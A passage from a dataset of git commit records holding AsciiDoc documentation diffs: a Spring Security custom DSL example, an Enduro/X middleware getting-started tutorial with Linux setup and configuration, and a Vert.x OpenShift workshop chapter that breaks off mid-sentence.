the init method\n\t\thttp.csrf().disable();\n\t}\n\n\t@Override\n\tpublic void configure(H http) throws Exception {\n\t\tApplicationContext context = http.getSharedObject(ApplicationContext.class);\n\n\t\t\/\/ here we lookup from the ApplicationContext. You can also just create a new instance.\n\t\tMyFilter myFilter = context.getBean(MyFilter.class);\n\t\tmyFilter.setFlag(flag);\n\t\thttp.addFilterBefore(myFilter, UsernamePasswordAuthenticationFilter.class);\n\t}\n\n\tpublic MyCustomDsl flag(boolean value) {\n\t\tthis.flag = value;\n\t\treturn this;\n\t}\n\n\tpublic static MyCustomDsl customDsl() {\n\t\treturn new MyCustomDsl();\n\t}\n}\n----\n\nNOTE: This is actually how methods like `HttpSecurity.authorizeRequests()` are implemented.\n\nThe custom DSL can then be used like this:\n\n[source,java]\n----\n@EnableWebSecurity\npublic class Config extends WebSecurityConfigurerAdapter {\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n\t\thttp\n\t\t\t.apply(customDsl())\n\t\t\t\t.flag(true)\n\t\t\t\t.and()\n\t\t\t...;\n\t}\n}\n----\n\nThe code is invoked in the following order:\n\n* Code in `Config`s configure method is invoked\n* Code in `MyCustomDsl`s init method is invoked\n* Code in `MyCustomDsl`s configure method is invoked\n\nIf you want, you can have `WebSecurityConfiguerAdapter` add `MyCustomDsl` by default by using `SpringFactories`.\nFor example, you would create a resource on the classpath named `META-INF\/spring.factories` with the following contents:\n\n.META-INF\/spring.factories\n----\norg.springframework.security.config.annotation.web.configurers.AbstractHttpConfigurer = sample.MyCustomDsl\n----\n\nUsers wishing to disable the default can do so explicitly.\n\n[source,java]\n----\n@EnableWebSecurity\npublic class Config extends WebSecurityConfigurerAdapter {\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n\t\thttp\n\t\t\t.apply(customDsl()).disable()\n\t\t\t...;\n\t}\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0efd6dc10d9a57014df37c4719b292fc428102e","subject":"Update GettingStartedTutorial.adoc","message":"Update GettingStartedTutorial.adoc","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/GettingStartedTutorial.adoc","new_file":"doc\/GettingStartedTutorial.adoc","new_contents":"Getting Started Tutorial\n========================\nMadars Vitolins\nv1.0, 2015-11:\n\tInitial draft\n:doctype: book\n\nAbout the guide\n---------------\nGetting started tutorial covers Enduro\/X installation from binary package,\nenvironment setup, creating a sample Enduro\/X server and creating sample client.\nThis include creating a neccessary configuration files. Finally the applicatioin is booted,\nand client process calls the sample server process.\n\n== Configuring Linux Kernel parameters\n\nKernel parameter configuration is needed for Enduro\/X runtime. It includes changing\nthe security and Posix queue settings.\n\n=== Security Configuration\n---------------------------------------------------------------------\n$ su - root\n# cat << EOF >> \/etc\/security\/limits.conf\n\n# Do not limit message Q Count.\n# Some Linux 3.x series kernels have a bug, that limits 1024 \n# queues for one system user.\n# In 2.6.x and 4.x this is fixed, to have \n# unlimited count of queues (memory limit).\n# ealrier and later Linuxes have fixed this issue.\n* soft msgqueue -1\n* hard msgqueue -1\n\n# Increase the number of open files \n* soft nofile 1024\n* hard nofile 65536\n\nEOF\n---------------------------------------------------------------------\n\n=== Message Queue Configuration\nAt the startup of the system needs to mount a Posix Queues folder, and needs to \nset a appropriate limits. To do this automatically at system startup, \nLinuxes which supports '\/etc\/rc.local', must add following lines before \"exit 0\":\n\n---------------------------------------------------------------------\n# Mount the \/dev\/mqueue\nmkdir \/dev\/mqueue\nmount -t mqueue none \/dev\/mqueue\n\n# Max Messages in Queue\necho 10000 > \/proc\/sys\/fs\/mqueue\/msg_max\n\n# Max message size (Currently Enduro\/X supports only 32K as max)\necho 32000 > \/proc\/sys\/fs\/mqueue\/msgsize_max\n\n# Max number of queues for user\necho 10000 > \/proc\/sys\/fs\/mqueue\/queues_max\n---------------------------------------------------------------------\n\n== Installing binary package (RPM for Centos 6.x)\n---------------------------------------------------------------------\n# wget http:\/\/www.endurox.org\/attachments\/download\/6\/endurox-2.3.2-1.centos6.x86_64.rpm\n# rpm -i endurox-2.3.2-1.centos6.x86_64.rpm\n---------------------------------------------------------------------\n\n== Configuring the application environment \nWe will run our app \"app1\" from new user \"user1\". Application domain will be located in \/opt\/app1 folder. With follwing direcotry structure:\n[options=\"compact\"]\n- \/opt\/app1\/conf - will contain configuration files.\n- \/opt\/app1\/src\/eclient - Enduro\/X sample client sources.\n- \/opt\/app1\/src\/eserver - Enduro\/X sample server process sources.\n- \/opt\/app1\/bin - for executables.\n- \/opt\/app1\/ubftab - for tables for field defintions.\n\nCreate the user & directories:\n---------------------------------------------------------------------\n# useradd -m user1\n# mkdir -p \/opt\/app1\/conf\n# mkdir -p \/opt\/app1\/src\/eclient\n# mkdir -p \/opt\/app1\/src\/eserver\n# mkdir -p \/opt\/app1\/bin\n# mkdir -p \/opt\/app1\/ubftab\n# mkdir -p \/opt\/app1\/tmp\n# mkdir -p \/opt\/app1\/log\n# chown -R user1 \/opt\/app1 \n---------------------------------------------------------------------\nNext we will configure environment files, file \/opt\/app1\/conf\/setndrx - this will contain neccessary configuration for Enduro\/X.\n\nCopy following text to \/opt\/app1\/conf\/setndrx\n---------------------------------------------------------------------\n#!\/bin\/bash\nexport NDRX_NODEID=1\n# If 1 - then yes, if 0 - then not clusterised.\nexport NDRX_CLUSTERISED=0\n# Load balance, 0 = process all locally, 100 = process all on remote servers\nexport NDRX_LDBAL=0\n# tpcall() timeout:\nexport NDRX_TOUT=60\n# where to write ulog\nexport NDRX_ULOG=\/opt\/app1\/log\nexport NDRX_QPREFIX=\/app1\nexport NDRX_SVCMAX=20000\nexport NDRX_SRVMAX=10000\nexport NDRX_QPATH=\/dev\/mqueue\nexport NDRX_SHMPATH=\/dev\/shm\n# Milli seconds to wait for command\nexport NDRX_CMDWAIT=1\nexport NDRX_DPID=\/opt\/app1\/tmp\/ndrxd.pid\n# Random key to indentify the processes beloning to this session (i.e. used in ps ef)\nexport NDRX_RNDK=\"0myWI5nu\"\n# System V Semaphores...\nexport NDRX_IPCKEY=44000\n# Posix queue config (attribs..)\n# Max number of messages that can be put in one queue\nexport NDRX_MSGMAX=1000\n# Daemon Q size...\nexport NDRX_DQMAX=100\n# Max message size (in bytes), max 64K\nexport NDRX_MSGSIZEMAX=10000\n# Where app domain lives\nexport NDRX_APPHOME=\/opt\/app1\n# Where NDRX runtime lives\nexport NDRX_HOME=\/usr\n# Debug config too\nexport NDRX_DEBUG_CONF=\/opt\/app1\/conf\/debug.conf\n# NDRX config too.\nexport NDRX_CONFIG=\/opt\/app1\/conf\/ndrxconfig.xml\nexport PATH=$PATH:\/opt\/app1\/bin\nexport export FLDTBLDIR=\/opt\/app1\/ubftab\n# Max fields for hashing UBF\nexport NDRX_UBFMAXFLDS=16000\n\n# Log & levels (basic for scripting..)\nexport NDRX_DMNLOG=\/opt\/app1\/log\/ndrxd.log\nexport NDRX_DMNLEV=5\n\nexport NDRX_LOG=\/opt\/app1\/log\/ndrx.log\nexport NDRX_LEV=5\n\n# Correct the path so that ndrx can find ndrxd\nexport PATH=$PATH:$NDRX_HOME\/bin\n\n# UBFTAB Exfields - Enduro\/X specifc, test.fd - our apps' UBF fields \nexport FIELDTBLS=Exfields,test.fd\n---------------------------------------------------------------------\n\n\n\nDebug config\n---------------------------------------------------------------------\n..\n---------------------------------------------------------------------\n\n== Creating the server process\n\n=== Defining the UBF fields\n\n=== Server source code\n\n=== Booting the server process\n\n=== Testing the service with \"ud\" command\n\n== Creating the client application\n\n=== Client binary source code\n\n=== Running the client process\n\n== Conclusions\n\n:numbered!:\n\n[bibliography]\nAdditional documentation \n------------------------\nThis section lists additional related documents.\n\n[bibliography]\n.Internet resources\n- [[[ATMI-API]]] http:\/\/docs.oracle.com\/cd\/E13203_01\/tuxedo\/tux71\/html\/pgint6.htm\n- [[[FML-API]]] http:\/\/docs.oracle.com\/cd\/E13203_01\/tuxedo\/tux91\/fml\/index.htm\n- [[[EX_OVERVIEW]]] ex_overview.pdf\n- [[[MQ_OVERVIEW]]] 'man 7 mq_overview'\n- [[[EX_ENV]]] 'man 5 ex_env' or 'ex_env.pdf'\n- [[[NDRXCONFIG]]] 'man 5 ndrxconfig.xml' or 'ndrxconfig.xml.pdf'\n- [[[DEBUGCONF]]] 'man 5 ndrxdebug.conf' or 'ndrxdebug.conf.pdf'\n- [[[XADMIN]]] 'man 8 xadmin' or 'xadmin.pdf'\n\n[glossary]\nGlossary\n--------\nThis section lists\n\n[glossary]\nATMI::\n Application Transaction Monitor Interface\n\nUBF::\n Unified Buffer Format it is similar API as Tuxedo's FML\n\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\nThe index is normally left completely empty, it's contents being\ngenerated automatically by the DocBook toolchain.\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n","old_contents":"Getting Started Tutorial\n========================\nMadars Vitolins\nv1.0, 2015-11:\n\tInitial draft\n:doctype: book\n\nAbout the guide\n---------------\nGetting started tutorial covers Enduro\/X installation from binary package,\nenvironment setup, creating a sample Enduro\/X server and creating sample client.\nThis include creating a neccessary configuration files. Finally the applicatioin is booted,\nand client process calls the sample server process.\n\n== Configuring Linux Kernel parameters\n\nKernel parameter configuration is needed for Enduro\/X runtime. It includes changing\nthe security and Posix queue settings.\n\n=== Security Configuration\n---------------------------------------------------------------------\n$ su - root\n# cat << EOF >> \/etc\/security\/limits.conf\n\n# Do not limit message Q Count.\n# Some Linux 3.x series kernels have a bug, that limits 1024 \n# queues for one system user.\n# In 2.6.x and 4.x this is fixed, to have \n# unlimited count of queues (memory limit).\n# ealrier and later Linuxes have fixed this issue.\n* soft msgqueue -1\n* hard msgqueue -1\n\n# Increase the number of open files \n* soft nofile 1024\n* hard nofile 65536\n\nEOF\n---------------------------------------------------------------------\n\n=== Message Queue Configuration\nAt the startup of the system needs to mount a Posix Queues folder, and needs to \nset a appropriate limits. To do this automatically at system startup, \nLinuxes which supports '\/etc\/rc.local', must add following lines before \"exit 0\":\n\n---------------------------------------------------------------------\n# Mount the \/dev\/mqueue\nmkdir \/dev\/mqueue\nmount -t mqueue none \/dev\/mqueue\n\n# Max Messages in Queue\necho 10000 > \/proc\/sys\/fs\/mqueue\/msg_max\n\n# Max message size (Currently Enduro\/X supports only 32K as max)\necho 32000 > \/proc\/sys\/fs\/mqueue\/msgsize_max\n\n# Max number of queues for user\necho 10000 > \/proc\/sys\/fs\/mqueue\/queues_max\n---------------------------------------------------------------------\n\n== Installing binary package (RPM for Centos 6.x)\n---------------------------------------------------------------------\n# wget http:\/\/www.endurox.org\/attachments\/download\/6\/endurox-2.3.2-1.centos6.x86_64.rpm\n# rpm -i endurox-2.3.2-1.centos6.x86_64.rpm\n---------------------------------------------------------------------\n\n== Configuring the application environment \nWe will run our app \"app1\" from new user \"user1\". Application domain will be located in \/opt\/app1 folder. With follwing direcotry structure:\n[options=\"compact\"]\n- \/opt\/app1\/conf - will contain configuration files.\n- \/opt\/app1\/src\/eclient - Enduro\/X sample client sources.\n- \/opt\/app1\/src\/eserver - Enduro\/X sample server process sources.\n- \/opt\/app1\/bin - for executables.\n- \/opt\/app1\/ubftab - for tables for field defintions.\n\nCreate the user & directories:\n---------------------------------------------------------------------\n# useradd -m user1\n# mkdir -p \/opt\/app1\/conf\n# mkdir -p \/opt\/app1\/src\/eclient\n# mkdir -p \/opt\/app1\/src\/eserver\n# mkdir -p \/opt\/app1\/bin\n# mkdir -p \/opt\/app1\/ubftab\n# mkdir -p \/opt\/app1\/tmp\n# mkdir -p \/opt\/app1\/log\n# chown -R user1 \/opt\/app1 \n---------------------------------------------------------------------\nNext we will configure environment files, file \/opt\/app1\/conf\/setndrx - this will contain neccessary configuration for Enduro\/X.\n\nCopy following text to \/opt\/app1\/conf\/setndrx\n---------------------------------------------------------------------\n#!\/bin\/bash\nexport NDRX_NODEID=1\n# If 1 - then yes, if 0 - then not clusterised.\nexport NDRX_CLUSTERISED=0\n# Load balance, 0 = process all locally, 100 = process all on remote servers\nexport NDRX_LDBAL=0\n# tpcall() timeout:\nexport NDRX_TOUT=60\n# where to write ulog\nexport NDRX_ULOG=\/opt\/app1\/log\nexport NDRX_QPREFIX=\/app1\nexport NDRX_SVCMAX=20000\nexport NDRX_SRVMAX=10000\nexport NDRX_QPATH=\/dev\/mqueue\nexport NDRX_SHMPATH=\/dev\/shm\n# Milli seconds to wait for command\nexport NDRX_CMDWAIT=1\nexport NDRX_DPID=\/opt\/app1\/tmp\/ndrxd.pid\n# Random key to indentify the processes beloning to this session (i.e. used in ps ef)\nexport NDRX_RNDK=\"0myWI5nu\"\n# System V Semaphores...\nexport NDRX_IPCKEY=44000\n# Posix queue config (attribs..)\n# Max number of messages that can be put in one queue\nexport NDRX_MSGMAX=1000\n# Daemon Q size...\nexport NDRX_DQMAX=100\n# Max message size (in bytes), max 64K\nexport NDRX_MSGSIZEMAX=10000\n# Where app domain lives\nexport NDRX_APPHOME=\/opt\/app1\n# Where NDRX runtime lives\nexport NDRX_HOME=\/usr\n# Debug config too\nexport NDRX_DEBUG_CONF=\/opt\/app1\/conf\/debug.conf\n# NDRX config too.\nexport NDRX_CONFIG=\/opt\/app1\/conf\/ndrxconfig.xml\nexport PATH=$PATH:\/opt\/app1\/bin\nexport export FLDTBLDIR=\/opt\/app1\/ubftab\n# Max fields for hashing UBF\nexport NDRX_UBFMAXFLDS=16000\n\n# Log & levels (basic for scripting..)\nexport NDRX_DMNLOG=\/opt\/app1\/log\/ndrxd.log\nexport NDRX_DMNLEV=5\n\nexport NDRX_LOG=\/opt\/app1\/log\/ndrx.log\nexport NDRX_LEV=5\n\n# Correct the path so that ndrx can find ndrxd\nexport PATH=$PATH:$NDRX_HOME\/bin\n\n# UBFTAB Exfields - Enduro\/X specifc, test.fd - our apps' UBF fields \nexport FIELDTBLS=Exfields,test.fd\n---------------------------------------------------------------------\n\nBasic application server configuration (\/opt\/app1\/conf\/ndrxconfig.xml)\n---------------------------------------------------------------------\n<?xml version=\"1.0\" ?>\n<endurox>\n <appconfig>\n <!-- ALL BELLOW ONES USES <sanity> periodical timer -->\n <!-- Sanity check time, sec -->\n <sanity>5<\/sanity>\n <!--\n Seconds in which we should send service refresh to other node.\n -->\n <brrefresh>6<\/brrefresh>\n \n <!-- <sanity> timer, end -->\n \n <!-- ALL BELLOW ONES USES <respawn> periodical timer -->\n <!-- Do dead process restart every X seconds \n NOT USED ANYMORE, REPLACED WITH SANITY!\n <respawncheck>10<\/respawncheck>\n -->\n <!-- Do process reset after 1 sec -->\n <restart_min>1<\/restart_min>\n <!-- If restart fails, then boot after +5 sec of previous wait time -->\n <restart_step>1<\/restart_step>\n <!-- If still not started, then max boot time is a 30 sec. -->\n <restart_max>5<\/restart_max>\n <!-- <sanity> timer, end -->\n \n <!-- Time after attach when program will start do sanity & respawn checks,\n starts counting after configuration load -->\n <restart_to_check>20<\/restart_to_check>\n \n <!-- Setting for pq command, should ndrxd collect service \n queue stats automatically\n If set to Y or y, then queue stats are on.\n Default is off.\n -->\n <gather_pq_stats>Y<\/gather_pq_stats>\n \n\t<\/appconfig>\n <defaults>\n <min>1<\/min>\n <max>2<\/max>\n <!-- Kill the process which have not started in <start_max> time -->\n <autokill>1<\/autokill>\n <!--\n <respawn>1<respawn>\n -->\n <!--\n <env><\/env> works here too!\n -->\n <!-- The maximum time while process can hang in 'starting' state i.e.\n have not completed initialization, sec\n X <= 0 = disabled \n -->\n <start_max>2<\/start_max>\n <!--\n Ping server in every X seconds (step is <sanity>).\n -->\n <pingtime>1<\/pingtime>\n <!--\n Max time in seconds in which server must respond.\n The granularity is sanity time.\n X <= 0 = disabled \n -->\n <ping_max>4<\/ping_max>\n <!--\n Max time to wait until process should exit on shutdown\n X <= 0 = disabled \n -->\n <end_max>30<\/end_max>\n <!-- Interval, in seconds, by which signal sequence -2, -15, -9, -9.... will be sent\n to process until it have been terminated. -->\n <killtime>1<\/killtime>\n <!-- List of services (comma separated) for ndrxd to export services over bridges -->\n <!-- <exportsvcs>FOREX<\/exportsvcs> -->\n\t<\/defaults>\n\t<servers>\n\t\t<!-- This is binary we are about to build -->\n\t\t<server name=\"eserver\">\n\t\t\t<srvid>1<\/srvid>\n\t\t\t<min>2<\/min>\n\t\t\t<max>2<\/max>\n\t\t\t<sysopt>-e \/opt\/app1\/log\/ESERVER -r<\/sysopt>\n\t\t<\/server>\n\t<\/servers>\n<\/endurox>\n\n---------------------------------------------------------------------\n\nDebug config\n---------------------------------------------------------------------\n\n---------------------------------------------------------------------\n\n== Creating the server process\n\n=== Defining the UBF fields\n\n=== Server source code\n\n=== Booting the server process\n\n=== Testing the service with \"ud\" command\n\n== Creating the client application\n\n=== Client binary source code\n\n=== Running the client process\n\n== Conclusions\n\n:numbered!:\n\n[bibliography]\nAdditional documentation \n------------------------\nThis section lists additional related documents.\n\n[bibliography]\n.Internet resources\n- [[[ATMI-API]]] http:\/\/docs.oracle.com\/cd\/E13203_01\/tuxedo\/tux71\/html\/pgint6.htm\n- [[[FML-API]]] http:\/\/docs.oracle.com\/cd\/E13203_01\/tuxedo\/tux91\/fml\/index.htm\n- [[[EX_OVERVIEW]]] ex_overview.pdf\n- [[[MQ_OVERVIEW]]] 'man 7 mq_overview'\n- [[[EX_ENV]]] 'man 5 ex_env' or 'ex_env.pdf'\n- [[[NDRXCONFIG]]] 'man 5 ndrxconfig.xml' or 'ndrxconfig.xml.pdf'\n- [[[DEBUGCONF]]] 'man 5 ndrxdebug.conf' or 'ndrxdebug.conf.pdf'\n- [[[XADMIN]]] 'man 8 xadmin' or 'xadmin.pdf'\n\n[glossary]\nGlossary\n--------\nThis section lists\n\n[glossary]\nATMI::\n Application Transaction Monitor Interface\n\nUBF::\n Unified Buffer Format it is similar API as Tuxedo's FML\n\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\nThe index is normally left completely empty, it's contents being\ngenerated automatically by the DocBook toolchain.\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"97d16dddf346c4641411c4235e743f222dc29db3","subject":"Minor changes based on review","message":"Minor changes based on review\n","repos":"cescoffier\/vertx-kubernetes-workshop,cescoffier\/vertx-kubernetes-workshop,cescoffier\/vertx-kubernetes-workshop,cescoffier\/vertx-kubernetes-workshop","old_file":"docs\/chapters\/4-kubernetes.adoc","new_file":"docs\/chapters\/4-kubernetes.adoc","new_contents":"## First step with Kubernetes\n\nFollowing a microservice approach will help you increase your _agility_. However, it does not come for free and\nrequires a lot of discipline. It also stresses your deployment facilities. When the number of microservices grows, it\nvery quickly becomes an issue to keep your system on track.\n\nTo help us with this, containers are a great packaging and runtime technology. Your application runs in an\n_isolated_ container, avoiding resource conflicts. But to deploy a set of containers and keep them coordinated, you\nneed a container platform. That's what Kubernetes is. Kubernetes defines a set of building blocks (\"primitives\") which\ncollectively provide mechanisms for deploying, maintaining, and scaling applications packaged inside containers. OpenShift\n _extends_ Kubernetes with build automation and a routing system, while inheriting all the primitives from Kubernetes.\n\nimage::openshift-architecture.png[OpenShift Architecture, 800]\n\n### Primitives\n\n#### Pod\n\nThe basic scheduling unit in Kubernetes is called a _pod_. It adds a higher level of abstraction to containerized components.\nA pod consists of one or more containers that are guaranteed to be co-located on the host machine and can share resources.\nEach pod in Kubernetes is assigned a unique (within the cluster) IP address, which allows applications to use ports without\n the risk of conflict. A pod can define a _volume_, such as a local disk directory or a network disk, and expose it to\n the containers in the pod. Pods can be manually managed through the Kubernetes API, or their management can be\n delegated to a controller.\n\n#### Labels and Selectors\n\nKubernetes enables clients (users or internal components) to attach key-value pairs called _labels_ to any API object\n in the system, such as pods. Correspondingly, _label selectors_ are queries against labels that resolve to matching\n objects. Labels and selectors are the primary grouping mechanism in Kubernetes and are used to determine the components\n to which an operation applies. Labels and selectors are used to group entities together.\n\n#### Replication Controller and Deployment\n\nControllers are entities managing other entities in order to keep them in a specific state. For instance, a\nreplication controller has the responsibility to keep alive _x_ replicas of a pod. When one of these replicas dies or\n becomes unresponsive, the controller kills it and restarts one. Likewise, if there are more replicas running than desired,\n it deletes as many as necessary to match the number.\n\nThe definition of a replication controller consists mainly of:\n\n1. The number of replicas desired (which can be adjusted at runtime).\n2. A pod definition for creating a replicated pod.\n3. A selector for identifying managed pods (using labels)\n\nBuilding on replication controllers, OpenShift expands support for the deployment lifecycle with the concept of _deployments_.\n In the simplest case, a deployment just creates a new replication controller and lets it start up pods. However, OpenShift\n deployments also provide the ability to transition from an existing deployment (_v1_ for instance) of an image to a new\n one (_v2_ for instance) and also define hooks to be run before or after creating the replication controller.\n\nOpenshift deployments propose a set of strategies. The default is _rolling_ which implements (as the name implies) rolling \nupdates and ensures that you don't disrupt your service. Before stopping the pod, it ensures that the new _version_ is alive and \nready. Then, it routes requests to this new pod and dispose the old one. Other strategies provided include _recreate_, \n_blue-green_, _A\/B_, and the ability to create a custom strategy.\n\n#### Build and Image\n\nAs stated in the previous section, `deployments` are responsible for keeping the application running. But we need to\nprovide the application first. The application is pushed to OpenShift as an (container) _image_. This image is\ncreated by a _build_ and instantiated by the _deployment_.\n\nA build is the process of transforming your code into an image. The process is described in a `BuildConfig` object. Build\nobjects share common characteristics: inputs for a build (source code, artifacts), the need to complete a build process,\nlogging the build process, publishing resources from successful builds, and publishing the final status of the build.\n\nThere are different types of builds. You can create a `Docker` build taking a `Dockerfile` as parameter. The\nresulting image is generated by _building_ the `Dockerfile`. OpenShift also provides the concept of S2I (Source to\nImage) as a tool to provide reproducible images. In this lab, we are going to use S2I with binary content. We are\ngoing to build the application on our machine and push the resulting artifact (a _fat jar_) as input to an S2I build.\nThis build creates an image for starting the application.\n\nimage::openshift-build-process.png[OpenShift Build Process, 800]\n\n#### Services\n\nOk, so we know how our application is going to be _built_ and instantiated on OpenShift. But how are we going to use\nit? For this we need _services_. A _service_ identifies a set of pods (using labels) in order to proxy the connections\nit receives to them. Backing pods can be added to or removed from a service arbitrarily while the service remains\nconsistently available enabling anything that depends on the service to refer to it at a consistent internal address.\n\nServices are assigned an IP address and port pair that, when accessed, proxy to an appropriate backing pod. A service\nuses a label selector to find all the containers running that provide a certain network service on a certain port.\n\nimage::openshift-service.png[OpenShift Services, 400]\n\n#### Routes\n\n_Routes_ are the last concept to understand before starting to use OpenShift. Services provides an internal IP.\nRoutes exposes a service outside of OpenShift. A route allows you to associate a service with an externally-reachable\n host name.\n\nimage::openshift-entities.png[OpenShift Entities, 800]\n\n### Installing and Starting OpenShift\n\nWe are going to use _minishift_ (https:\/\/github.com\/minishift\/minishift) to run OpenShift locally on your machine.\n\nBefore starting minishift, you need to install a hypervisor. Check the https:\/\/docs.openshift.org\/latest\/minishift\/getting-started\/installing.html \nto check what are the supported ones for your operating system. When in doubt, use VirtualBox (https:\/\/www.virtualbox.org\/wiki\/Downloads). \nBe sure to have a hypervisor before continuing.\n\nIf not already done, download the latest release from https:\/\/github.com\/minishift\/minishift\/releases (do not\nuse beta). Download the archive and copy the `minishift` executable in the directory of your choice. Add this\ndirectory to your system `$PATH`. \n\nThen, in a terminal, run:\n\n[source, bash]\n----\nminishift start\n----\n\nWhen the starting sequence completes, you should get the URL of the OpenShift Web Console such as: `https:\/\/192.168\n.64.12:8443`. Open this url in a browser and connect using the default `developer\/developer` credentials.\n\nNow we have OpenShift running, but we need a way to interact with it. The _OpenShift Client_ (`oc`) is a command line\n tool to interact with OpenShift. Fortunately, this client is shipped with minishift. Use `minishift oc-env` to display\n the command you need to type into your shell in order to add the oc binary to your PATH environment variable. Then,\n run the following `oc` command to connect to your OpenShift instance:\n\n[source, bash]\n----\noc login -u developer -p developer\n----\n\nTIP: for Unix style shells you can run `eval $(minishift oc-env)` to make `oc` available.\n\nNow, you are ready to deploy your first application.\n\n### Your first project and deployment\n\nWe are going to use a specific project to host all the microservices developed in this lab. A `project` is a\nnamespace making easy to organize your different applications in OpenShift. In a terminal run:\n\n[source, bash]\n----\noc new-project vertx-kubernetes-workshop\noc policy add-role-to-user view admin -n vertx-kubernetes-workshop\noc policy add-role-to-user view -n vertx-kubernetes-workshop -z default\noc policy add-role-to-group view system:serviceaccounts -n vertx-kubernetes-workshop\n----\n\nThe first instruction creates the project. The 3 last instructions grant permissions in order to use all the\nOpenShift capabilities.\n\nIn the OpenShift Web Console, you should see the newly created project. Click on it. It's empty, so let's deploy our\nfirst application.\n\nIn the workshop source code, locate the `currency-3rdparty-service` and navigate to the directory in your terminal.\nNow issue the `mvn fabric8:deploy` command:\n\n[source, bash]\n----\ncd $WORKSHOP_ROOT\/currency-3rdparty-service\nmvn fabric8:deploy\n----\n\nThe `fabric8 maven plugin` is a Maven Plugin facilitating the deployment of OpenShift applications. The `:deploy`\nmojo packages the application and triggers the S2I build described above.\n\nIn your browser, check the content of the project. You should see something like:\n\nimage::openshift-first-deployment.png[First deployment, 1024]\n\n\nClick on the route url and you should see `ok`. This indicates that your first application was successfully deployed.\n\n\n","old_contents":"## First step with Kubernetes\n\nFollowing a microservice approach will help you increasing your _agility_. However, it does not come for free and\nrequires a lot of discipline. It also stresses your deployment facilities. When the number of microservice grows, it\nbecomes very quickly an issue to maintain your system on track.\n\nTo help us with this, containers are a great packaging and runtime technology. Your application runs in an\n_isolated_ container, avoiding resource conflicts. But to deploy a set of containers and keep them coordinated, you\nneed a container platform. That's what Kubernetes is. Kubernetes defines a set of building blocks (\"primitives\") which\ncollectively provide mechanisms for deploying, maintaining, and scaling applications packaged inside containers. OpenShift\n _extends_ Kubernetes with build automation and routing system, but inherits from all these Kubernetes\nprimitives.\n\nimage::openshift-architecture.png[OpenShift Architecture, 800]\n\n### Primitives\n\n#### Pod\n\nThe basic scheduling unit in Kubernetes is called a _pod_. It adds a higher level of abstraction to containerized components.\nA pod consists of one or more containers that are guaranteed to be co-located on the host machine and can share resources.\nEach pod in Kubernetes is assigned a unique (within the cluster) IP address, which allows applications to use ports without\n the risk of conflict. A pod can define a _volume_, such as a local disk directory or a network disk, and expose it to\n the containers in the pod. Pods can be manually managed through the Kubernetes API, or their management can be\n delegated to a controller.\n\n#### Labels and Selectors\n\nKubernetes enables clients (users or internal components) to attach key-value pairs called _labels_ to any API object\n in the system, such as pods. Correspondingly, _label selectors_ are queries against labels that resolve to matching\n objects. Labels and selectors are the primary grouping mechanism in Kubernetes, and are used to determine the components\n to which an operation applies. Labels and selectors are used to group entities together.\n\n#### Replication Controller and Deployment\n\nControllers are entities managing other entities in order to keep them in a specific state. For instance, a\nreplication controller has the responsibility to keep alive _x_ replicas of a pod. When one of these replicas dies or\n becomes irresponsive, the controller kills it and restarts one. Likewise, if there are more replicas running than desired,\n it deletes as many as necessary to match the number.\n\nThe definition of a replication controller consists mainly of:\n\n1. The number of replicas desired (which can be adjusted at runtime).\n2. A pod definition for creating a replicated pod.\n3. A selector for identifying managed pods (using labels)\n\nBuilding on replication controllers, OpenShift expands support for the deployment lifecycle with the concept of _deployments_.\n In the simplest case, a deployment just creates a new replication controller and lets it start up pods. However, OpenShift\n deployments also provide the ability to transition from an existing deployment (_v1_ for instance) of an image to a new\n one (_v2_ for instance) and also define hooks to be run before or after creating the replication controller.\n\nOpenshift deployments proposes a set of strategy. One of them named _rolling_ implements a rolling updates and ensure\n that you don't disrupt your service. Before stopping the pod, it ensures that the new _version_ is alive and ready.\n Then it routes requests to this new pod and dispose the old one.\n\n#### Build and Image\n\nAs said in the previous section, `deployments` are responsible to keep the application running. But we need to\nprovide this application first. This application is pushed to OpenShift as an (container) _image_. This image is\ncreated by a _build_ and instantiated by the _deployment_.\n\nA build is the process of transforming your code into an image. The process is described in a `BuildConfig` object. Build\nobjects share common characteristics: inputs for a build (source code, artifacts), the need to complete a build process,\nlogging the build process, publishing resources from successful builds, and publishing the final status of the build.\n\nThere are different types of builds. You can create a `Docker` build taking a `Dockerfile` as parameter. The\nresulting image is generated by _building_ the `Dockerfile`. OpenShift also provides the concept of S2I (Source to\nImage) as a tool to provide reproducible image. In this lab, we are going to use S2I with binary content. We are\ngoing to build the application on our machine and push the resulting artifact (_fat jar_) as input of a S2I build.\nThis build creates an image starting the application.\n\nimage::openshift-build-process.png[OpenShift Build Process, 800]\n\n#### Services\n\nOk, so we know how our application is going to be _built_ and instantiated on OpenShift. But how are we going to use\nit? For this we need _services_. A _service_ identifies a set of pods (using labels) in order to proxy the connections\nit receives to them. Backing pods can be added to or removed from a service arbitrarily while the service remains\nconsistently available, enabling anything that depends on the service to refer to it at a consistent internal address.\n\nServices are assigned an IP address and port pair that, when accessed, proxy to an appropriate backing pod. A service\nuses a label selector to find all the containers running that provide a certain network service on a certain port.\n\nimage::openshift-service.png[OpenShift Services, 400]\n\n#### Routes\n\n_Routes_ are the last concept to understand before starting to use OpenShift. Services provides an internal IP.\nRoutes exposes a service outside of OpenShift. A route allows you to associate a service with an externally-reachable\n 